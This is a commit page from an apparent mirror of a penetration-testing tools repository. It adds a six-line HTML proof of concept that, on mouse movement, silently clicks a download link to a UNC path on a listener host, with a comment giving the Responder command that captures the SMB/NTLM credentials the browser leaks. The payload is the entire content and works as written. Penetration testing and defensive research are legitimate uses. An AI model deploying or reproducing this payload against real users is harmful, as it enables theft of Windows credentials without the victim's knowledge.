mirror of
https://github.com/mgeeky/Penetration-Testing-Tools.git
synced 2025-09-02 10:08:34 +02:00
First
This commit is contained in:
6
networks/smb-credential-leak.html
Normal file
6
networks/smb-credential-leak.html
Normal file
@ -0,0 +1,6 @@
|
||||
<!-- PoC for leaking SMB Credentials with listening Responder -->
|
||||
<!-- as presented by X41 D-Sec GmbH in Browser Security White Paper. -->
|
||||
<!-- To be used as: $ `responder -I eth0 -w -r f -v` -->
|
||||
<body onmousemove="document.getElementById(6).click()">
|
||||
<a id=6 href="\\192.168.56.101\edgeleak" download></a>
|
||||
</body>
|
Reference in New Issue
Block a user